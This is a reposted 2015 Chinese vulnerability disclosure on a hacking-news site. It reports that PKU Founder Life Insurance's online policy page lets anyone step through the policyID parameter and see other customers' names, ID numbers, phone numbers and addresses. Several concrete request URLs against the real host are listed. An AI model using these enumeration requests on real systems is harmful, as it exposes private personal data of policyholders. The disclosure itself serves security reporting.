记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

北大方正人寿保单信息任意遍历(姓名、身份证号、手机号、住址等)

2015-04-20 19:35

https://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049772&ETPA=0



policyID可遍历

屏幕快照 2015-03-06 下午6.20.25.png



code 区域
http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049144&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049217&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049195&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049268&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049209&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049292&ETPA=0

http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049250&ETPA=0

漏洞证明:

屏幕快照 2015-03-06 下午6.21.43.png

屏幕快照 2015-03-06 下午6.22.13.png

屏幕快照 2015-03-06 下午6.22.21.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-099917

阅读:133893 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“北大方正人寿保单信息任意遍历(姓名、身份证号、手机号、住址等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云